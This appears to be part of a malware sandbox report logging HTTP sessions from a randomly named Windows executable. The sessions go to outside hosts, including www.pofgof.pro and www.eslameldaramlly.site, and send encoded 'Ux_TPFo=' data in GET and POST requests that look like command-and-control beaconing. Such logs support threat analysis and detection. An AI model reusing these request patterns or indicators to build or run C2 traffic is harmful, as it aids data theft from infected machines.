                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 70 71 6a 4e 46 35 50 42 77 4d 43 55 70 59 75 74 52 70 6f 35 69 5a 52 77 61 72 39 52 72 36 63 51 56 79 75 43 42 59 4d 4a 43 69 37 74 52 4e 4e 32 36 4c 42 6b 6b 4a 32 2b 48 4a 50 45 31 68 70 64 57 39 56 66 57 4f 42 33 65 58 63 30 4b 79 31 4b 53 2f 53 77 45 66 66 30 63 7a 68 39 2b 31 34 6b 77 78 48 42 5a 70 64 6d 35 2b 78 68 59 55 35 46 63 75 52 4d 6a 4a 4d 76 6d 5a 68 6b 45 47 53 63 69 5a 47 41 5a 32 4a 55 31 6a 61 57 50 69 55 33 56 61 34 6c 56 6e 41 76 30 6e 38 78 36 32 39 4c 49 66 65 36 43 63 78 74 2f 34 62 51 52 6a 62 77 48 41 58 33 2b 50 49 79 79 6d 76 2f 61 41 4d 51 76 70 45 33 39 34 41 50 63 53 46 64 4e 4e 41 4e 54 52 42 44 54 69 54 77 57 67 61 70 70 2b 49 42 49 42 4f 73 2b 73 33 72 44 6a 72 51 4b 4e 53 41 6d 78 35 37 6b 61 6e 56 31 4c 4c 55 34 4e 75 37 4f 47 70 55 56 35 63 34 65 36 32 30 38 50 49 58 64 66 6b 38 79 4a 45 4b 39 74 67 47 71 4d 2b 66 4d 65 55 50 4d 6d 52 6e 34 73 59 30 33 2b 56 4b 4d 31 36 65 62 47 32 47 48 66 59 52 58 32 4b 58 68 6a 74 63 65 37 70 6f 50 44 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=pqjNF5PBwMCUpYutRpo5iZRwar9Rr6cQVyuCBYMJCi7tRNN26LBkkJ2+HJPE1hpdW9VfWOB3eXc0Ky1KS/SwEff0czh9+14kwxHBZpdm5+xhYU5FcuRMjJMvmZhkEGSciZGAZ2JU1jaWPiU3Va4lVnAv0n8x629LIfe6Ccxt/4bQRjbwHAX3+PIyymv/aAMQvpE394APcSFdNNANTRBDTiTwWgapp+IBIBOs+s3rDjrQKNSAmx57kanV1LLU4Nu7OGpUV5c4e6208PIXdfk8yJEK9tgGqM+fMeUPMmRn4sY03+VKM16ebG2GHfYRX2KXhjtce7poPDyGeO20vudDFZdGJ4QsLlWMHS+xbrXO/3juAgSoKf2Apo+0kLx580PdW28hAksKGowNyjK1WHqxQn0EepaNVWuU41m1AHCKnql3qiNBLGtlcWWsc3FVv+W6zEkjM/Oyohg5COLtwQL0guLcuqIGpSLVrIfFqyLFtWljVVcUoye36xtYwQJEepkEFom/gOKMcIHi78reRpv44/qzmn0ggq5CPbtvkn7fwc8HWchBQwlsRSY6MTkbQWrwF3UtMzkx3cNNwmQj8ltmrEfQpvp0omxD6mupjphE2Rw7iteGOOdvHJx6pPMq4/vdlAKDH+IkjuEwK3jvPqaqWJvkzXdIpGgN9A2pyOp0T3viDsAbfpdpAiSWmugOkEERCRNCe5xJbUP9OWxMTkTZpQOC6RMESoRd3ZWve6jzU4ZqxvSHYObz0oaRbNHzbJp60sfFoZs3pjC6nFBz59F9rz0cblOYRTtqIg1I3TzqQxDGw/fLS9+EdtB+ts0AOOLoXoPTflZQHBLOHATv70mmLG5dF/wk4r/v1GmomAlAeSHTEMHKHTUrJAlCy/WsiVzrwsWb1yHaiYm8j0JH8q/ugsMojLK39nCuA/v4pJFXqGxbwkHgF44ye8iO/A3PRdwg/COfVpKqQyyFUjgN4pfMlR3QciIvcnoPaJvGWP1txOI5 [TRUNCATED]
                                                              Sep 25, 2024 09:17:01.988332987 CEST1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:17:01 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:17:01.988351107 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.849731148.251.114.233806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:03.881491899 CEST480OUTGET /30vc/?Ux_TPFo=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.eslameldaramlly.site
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:04.515032053 CEST1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:17:04 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:17:04.515047073 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.849732209.74.95.29806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:09.704190969 CEST719OUTPOST /gfz9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.pofgof.pro
                                                              Origin: http://www.pofgof.pro
                                                              Referer: http://www.pofgof.pro/gfz9/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4f 47 71 6c 4d 62 59 4c 64 38 50 4a 6d 76 34 6f 6c 45 37 44 56 62 61 42 46 63 6b 4c 54 6b 46 74 4e 6e 54 32 34 2b 4f 79 37 2b 55 6a 76 38 77 61 31 47 44 33 4c 68 35 62 57 34 50 73 43 75 71 68 71 42 6d 71 61 6e 4e 37 4a 4a 6e 35 5a 4b 7a 69 78 6d 36 51 48 45 32 61 69 51 73 43 76 68 37 6f 2f 66 4e 63 47 37 4a 43 45 66 7a 58 54 4b 58 68 76 43 37 62 49 68 45 31 4c 67 50 52 76 44 61 64 41 38 56 65 58 79 47 45 47 46 34 30 4c 4c 67 63 47 76 48 7a 39 33 51 45 55 42 76 65 6c 33 4e 73 7a 71 78 31 59 63 57 75 62 46 66 4d 36 4a 39 4c 34 73 48 4c 6a 6b 59 30 6c 2b 70 32 54 52 33 6f 4e 64 39 6c 72 70 59 3d
                                                              Data Ascii: Ux_TPFo=OGqlMbYLd8PJmv4olE7DVbaBFckLTkFtNnT24+Oy7+Ujv8wa1GD3Lh5bW4PsCuqhqBmqanN7JJn5ZKzixm6QHE2aiQsCvh7o/fNcG7JCEfzXTKXhvC7bIhE1LgPRvDadA8VeXyGEGF40LLgcGvHz93QEUBvel3Nszqx1YcWubFfM6J9L4sHLjkY0l+p2TR3oNd9lrpY=
                                                              Sep 25, 2024 09:17:10.284580946 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:10 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                              Sep 25, 2024 09:17:10.284598112 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                              Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                              Sep 25, 2024 09:17:10.284610033 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                              Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                              Sep 25, 2024 09:17:10.284784079 CEST1236INData Raw: 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                              Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                              Sep 25, 2024 09:17:10.284795046 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                              Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Prop
                                                              Sep 25, 2024 09:17:10.284805059 CEST1236INData Raw: 65 72 74 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d
                                                              Data Ascii: erty</a> </div> </nav> </div> ... Navbar End --> ... Header Start --> <div class="container-fluid header bg-white p-0"> <div class="row g-0 align-items-center
                                                              Sep 25, 2024 09:17:10.284816027 CEST224INData Raw: 3d 22 30 2e 31 73 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: ="0.1s" style="padding: 35px;"> <div class="container"> <div class="row g-2"> <div class="col-md-10"> <div class="row g-2">
                                                              Sep 25, 2024 09:17:10.285383940 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                              Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                              Sep 25, 2024 09:17:10.285393953 CEST224INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                              Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div>
                                                              Sep 25, 2024 09:17:10.285406113 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 34 30 34 20
                                                              Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                              Sep 25, 2024 09:17:10.289688110 CEST1236INData Raw: 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61
                                                              Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345 67890</p>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.849733209.74.95.29806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:12.245866060 CEST739OUTPOST /gfz9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.pofgof.pro
                                                              Origin: http://www.pofgof.pro
                                                              Referer: http://www.pofgof.pro/gfz9/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4f 47 71 6c 4d 62 59 4c 64 38 50 4a 6e 50 49 6f 70 46 37 44 5a 72 61 47 62 73 6b 4c 5a 45 46 70 4e 6e 66 32 34 38 6a 70 37 4d 77 6a 75 63 67 61 30 48 44 33 49 68 35 62 59 59 4f 6b 64 2b 71 75 71 42 6a 56 61 69 74 37 4a 4e 50 35 5a 50 58 69 79 58 36 54 46 55 32 59 76 77 73 54 68 42 37 6f 2f 66 4e 63 47 37 4e 34 45 62 66 58 55 36 4c 68 73 6a 37 59 42 42 45 32 62 41 50 52 72 44 61 6e 41 38 56 38 58 7a 62 52 47 48 41 30 4c 4b 51 63 46 36 72 30 6b 48 51 4b 51 42 76 4d 6a 32 63 54 2b 62 6b 61 56 64 54 4a 63 58 50 2b 79 66 51 68 69 4f 50 4e 67 6b 77 66 6c 39 42 41 57 6d 71 41 58 2b 74 56 31 2b 50 63 59 32 57 53 65 48 6b 57 7a 76 71 53 47 5a 36 59 77 2f 71 4b
                                                              Data Ascii: Ux_TPFo=OGqlMbYLd8PJnPIopF7DZraGbskLZEFpNnf248jp7Mwjucga0HD3Ih5bYYOkd+quqBjVait7JNP5ZPXiyX6TFU2YvwsThB7o/fNcG7N4EbfXU6Lhsj7YBBE2bAPRrDanA8V8XzbRGHA0LKQcF6r0kHQKQBvMj2cT+bkaVdTJcXP+yfQhiOPNgkwfl9BAWmqAX+tV1+PcY2WSeHkWzvqSGZ6Yw/qK
                                                              Sep 25, 2024 09:17:12.820014954 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:12 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                              Sep 25, 2024 09:17:12.820029974 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                              Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                              Sep 25, 2024 09:17:12.820066929 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                              Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
